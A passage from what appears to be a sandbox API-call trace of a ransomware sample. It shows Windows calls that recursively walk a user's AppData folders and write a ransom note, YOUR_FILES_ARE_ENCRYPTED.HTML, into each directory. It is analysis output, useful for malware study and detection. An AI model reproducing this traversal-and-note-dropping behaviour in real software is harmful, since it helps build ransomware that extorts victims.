Size=0x10000) returned 0x74c2008 [0165.253] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0165.253] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0165.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.254] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.254] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.254] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.255] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0165.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\excel\\xlstart\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.256] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.259] CloseHandle (hObject=0x304) returned 1 [0165.259] GetProcessHeap () returned 0x270000 [0165.260] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.260] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0165.261] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.261] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0165.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\excel\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.262] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, 
lpOverlapped=0x0) returned 1 [0165.265] CloseHandle (hObject=0x5e4) returned 1 [0165.265] GetProcessHeap () returned 0x270000 [0165.267] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0165.267] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 67 [0165.267] GetProcessHeap () returned 0x270000 [0165.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.267] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0165.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0165.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.268] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.268] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0165.268] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 80 [0165.268] GetProcessHeap () returned 0x270000 [0165.268] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.268] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0165.268] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0165.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.268] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.268] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xdd, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 92 [0165.269] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.269] lstrlenW (lpString=".ini") returned 4 [0165.269] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.269] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaab38e80, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x585, dwReserved0=0x0, dwReserved1=0x60, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 117 [0165.269] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="Launch Internet Explorer Browser.lnk") returned=".lnk" [0165.269] lstrlenW (lpString=".lnk") returned 4 [0165.269] PathFindExtensionW (pszPath="Launch Internet Explorer Browser.lnk") returned=".lnk" [0165.269] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b00c220, ftCreationTime.dwHighDateTime=0x1d709ba, 
ftLastAccessTime.dwLowDateTime=0x2b00c220, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2b032380, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x4ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 102 [0165.269] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0165.269] lstrlenW (lpString=".lnk") returned 4 [0165.269] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0165.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd36d1b2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x60, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0165.270] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 98 [0165.270] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.270] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0165.270] lstrlenW (lpString=".lnk") returned 4 [0165.270] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0165.270] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0165.270] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 92 [0165.270] GetProcessHeap () returned 0x270000 [0165.270] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.271] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0165.271] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0165.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.272] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.272] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0165.272] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 113 [0165.272] GetProcessHeap () returned 0x270000 [0165.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.275] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User 
Pinned\\ImplicitAppShortcuts") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0165.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0165.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0165.277] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.277] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.277] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.277] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0165.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.281] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.284] CloseHandle (hObject=0x58c) returned 1 [0165.285] GetProcessHeap () returned 0x270000 [0165.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.287] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0165.287] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 100 [0165.287] GetProcessHeap () returned 0x270000 [0165.287] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.287] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0165.287] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0165.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, 